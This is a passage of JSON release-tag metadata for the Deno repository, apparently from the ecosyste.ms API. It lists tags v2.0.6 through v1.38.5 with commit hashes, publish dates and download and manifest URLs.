/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"1